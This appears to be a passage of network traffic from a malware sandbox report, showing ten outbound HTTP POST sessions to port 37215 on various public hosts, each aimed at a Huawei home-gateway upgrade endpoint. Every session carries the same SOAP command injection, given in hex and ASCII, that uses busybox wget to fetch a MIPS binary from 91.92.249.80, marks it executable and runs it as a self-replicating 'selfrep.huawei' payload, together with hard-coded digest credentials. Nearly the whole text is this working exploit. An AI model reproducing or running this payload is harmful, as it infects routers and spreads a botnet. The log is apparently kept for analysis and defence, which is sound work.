                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          636192.168.2.236070441.57.134.19037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214628935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          637192.168.2.2351048197.218.71.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214670897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          638192.168.2.234201041.76.77.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214675903 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          639192.168.2.2354100197.203.116.21537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214694023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          640192.168.2.235691241.40.41.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214694977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          641192.168.2.2341494157.153.115.23237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214711905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          642192.168.2.2334958157.53.167.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214790106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          643192.168.2.2342448163.73.112.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214816093 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          644192.168.2.2334538157.9.211.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214818954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          645192.168.2.233392441.237.249.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214823008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
